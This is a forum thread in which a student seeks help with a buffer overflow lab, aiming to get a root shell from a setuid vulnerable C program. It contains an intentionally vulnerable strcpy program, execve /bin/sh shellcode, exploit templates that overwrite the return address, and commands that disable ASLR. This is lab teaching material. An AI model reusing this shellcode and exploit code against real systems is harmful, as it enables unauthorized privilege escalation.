Need help with Buffer Overflow Vulnerability Lab assignment

[EonsNearby]

I am stuck on a lab assignment where I need to use a version of ubuntu in VMware Player to write some .c files that will use a buffer overflow vulnerability to generate a shell that has root privileges. I can only use the following 2 files:

 

stack.c

#include <stdio.h>
int bof(char *str)
{
    char buffer[12];

    //BO Vulnerability
    strcpy(buffer,str);

    return 1;
}

int main(int argc, char* argv[])
{
    char str[517];

    FILE *badfile;
    badfile = fopen("badfile","r");

    fread(str, sizeof(char),517, badfile);
    bof(str);

    printf("Returned Properly\n");
    return 1;
}

 

exploit.c

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
char shellcode[]=
"\x31\xc0" 
"\x50" 
"\x68""//sh" 
"\x68""/bin" 
"\x89\xe3" 
"\x50" 
"\x53" 
"\x89\xe1" 
"\x99" 
"\xb0\x0b" 

"\xcd\x80" 
;
void main(int argc, char **argv)
{
    char buffer[517];
    FILE *badfile;
    /* Initialize buffer with 0x90 (NOP instruction) */
    memset(&buffer, 0x90, 517);
/* You need to fill the buffer with appropriate contents here */
/* Save the contents to the file "badfile" */
    badfile = fopen("./badfile", "w");
    fwrite(buffer, 517, 1, badfile);
    fclose(badfile);
}

 

Here are the changes I made to exploit.c:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define DEFAULT_OFFSET 350 

char shellcode[]=
"\x31\xc0" 
"\x50" 
"\x68""//sh" 
"\x68""/bin" 
"\x89\xe3" 
"\x50" 
"\x53" 
"\x89\xe1"
"\x99"
"\xb0\x0b" 
"\xcd\x80"
;

unsigned long get_sp(void)
{
    __asm__("movl %esp,%eax");
}

void main(int argc, char **argv)
{
    char buffer[517];
    FILE *badfile;
    char *ptr;
    long *a_ptr,ret;

    int offset = DEFAULT_OFFSET;
    int codeSize = sizeof(shellcode);
    int buffSize = sizeof(buffer);

    if(argc > 1) offset = atoi(argv[1]); //allows for command line input

    ptr=buffer;
    a_ptr = (long *) ptr;

    /* Initialize buffer with 0x90 (NOP instruction) */
    memset(buffer, 0x90, buffSize);

//----------------------BEGIN FILL BUFFER----------------------\\

    ret = get_sp()+offset;
    printf("Return Address: 0x%x\n",get_sp());
    printf("Address: 0x%x\n",ret);

    ptr = buffer;
    a_ptr = (long *) ptr;

    int i;
    for (i = 0; i < 300;i+=4)
    *(a_ptr++) = ret;

    for(i = 486;i < codeSize + 486;++i)
    buffer[i] = code[i-486];

    buffer[buffSize - 1] = '\0';
//-----------------------END FILL BUFFER-----------------------\\


/* Save the contents to the file "badfile" */
    badfile = fopen("./badfile", "w");
    fwrite(buffer,517,1,badfile);
    fclose(badfile);    
}

 

I execute the following in a terminal:

$ su root
$ Password]
# gcc -o stack -fno-stack-protector stack.c
# chmod 4755 stack
# exit
$ gcc -o exploit exploit.c
$./exploit
$./stack

 

The "badfile" is created and a shell is generated, but the shell only has basic user privileges instead of root privileges. Can someone help me with this?

[lightburst]

You are assuming we know what this buffer overflow vulnerability is.

[pwagen]

I don't have a computer on which to try this right now, so anything I say might be off.

 

You're supposed to use a buffer overflow vulnerability, that is, you need to write outside of something. However, from the looks of it, you're staying neatly within the boundaries everywhere in your code.

 

http://en.wikipedia.org/wiki/Buffer_overflow#Stack-based_exploitation

 

That link gives a few suggestions on what to overflow - a local variable, a return address or a function pointer. And since the lab is called something in the line of "buffer overflow", and you have a variable called "buffer", I'd start there. Either by making buffer a little smaller, or try to write outside of it by making buffSize a little larger.

 

Hope any of this helps.

[EonsNearby]

I tried increasing the size of bufferSize and codeSize (not at the same time), but still just generates a shell with user privileges.

I've tried assigning a value to buffer[517], but even doing that won't generate a shell with root privileges.

I know that the overflow occurs in the stack.c file, but I need to fill the "buffer" in exploit.c with the appropriate contents. I just don't know if what I am putting in it are the appropriate contents.

I did find this as a possible solution, but I can't get it to work. I don't know if it will be of help or not, but:

 

/* A program that creates a file containing code for launching shell*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
char shellcode[] =
    "\x31\xc0"             /* xorl    %eax,%eax              */
    "\x50"                 /* pushl   %eax                   */
/*
    We have to use //sh instead of /sh, because we need 32-bit padding
    and /sh only uses 24 bits. Linux will ignore the extra slash, so we
    don't have a problem.
*/
    "\x68""//sh"           /* pushl   $0x68732f2f            */
    "\x68""/bin"           /* pushl   $0x6e69622f            */
    "\x89\xe3"             /* movl    %esp,%ebx              */
/* Load the arguments for the function on the stack */
    "\x50"                 /* pushl   %eax                   */
    "\x53"                 /* pushl   %ebx                   */
    "\x89\xe1"             /* movl    %esp,%ecx              */
    "\x99"                 /* cdql                           */
/* Call exec */
    "\xb0\x0b"             /* movb    $0x0b,%al              */
    "\xcd\x80"             /* int     $0x80                  */
;

int main(int argc, char **argv)
{
    char buffer[500];
    FILE *badfile;
    int i;
    unsigned char address[4];

    /* Initialize buffer with 0x90 (NOP instruction) */
    memset(&buffer, 0x90, sizeof(buffer));

    /* You need to fill the buffer with appropriate contents here */
    memcpy(&buffer[sizeof(buffer) - 100], shellcode, sizeof(shellcode));

    /* Blow away the return address */
    /* Don't forget your endian-ness!!!!! */
    buffer[16] = 0x00; /* CHANGE ME (so this should be something like 0xB4 instead of 0x00 */
    buffer[17] = 0x00; /* CHANGE ME */
    buffer[18] = 0x00; /* CHANGE ME */
    buffer[19] = 0x00; /* CHANGE ME */


    /* Save the contents to the file "badfile" */
    badfile = fopen("./badfile", "w");
    fwrite(buffer, sizeof(buffer), 1, badfile);
    fclose(badfile);
}

 

I don't know what to change those "0x00" to.

Before I was supposed to execute any of this, I had to execute this in root

echo 0 > /proc/sys/kernel/randomize_va_space

 

The lab however says I need to execute the following in root instead

sysctl -w kernel.randomize_va_space=0

 

However, when I do the second one, then when I try to execute "stack", I get a "Segmentation fault".

[EonsNearby]

I recently found and read this article that talks about pratically the same thing I am trying to do:

 

http://web-agent.appspot.com/insecure.org/stf/smashstack.html

 

Based on this, it sounds like I am getting the exploit correctly, but it just is not generating a root shell. "stack" is set-root-UID program while "exploit" is a user owned program. I am just supposed to run stack as a normal user and not root, which I can do but I can't get a root shell. Now that I know that I am getting the exploit, can someone make a suggestion as to why I am not getting a root shell?

[pwagen]

I found a few interesting links regarding your lab. Not sure if any of them helps anything, but especially the first one seems to explain quite a bit, and do things about the same as what you're trying. See if any of them helps, and sorry if you've seen them before! Again, I won't be able to try any of this for a few weeks, so can't vouch for them being accurate, at all.

http://www.cis.syr.edu/~wedu/seed/Labs/Vulnerability/Buffer_Overflow/Buffer_Overflow.pdf

The next link seems to describe why some older techniques to do what you're trying to do, simply won't work today.

http://paulmakowski.wordpress.com/2011/01/25/smashing-the-stack-in-2011/

And one entitled "Stack Smashing on a Modern Linux System". Promising!

http://www.exploit-db.com/papers/24085/

Hopefully you can piece together what's going wrong with your code through a few more examples.

Edit: Also checking with people I might know, who might have a clue. Because I'd be really interested in the solution.

Edited February 19, 2013 by pwagen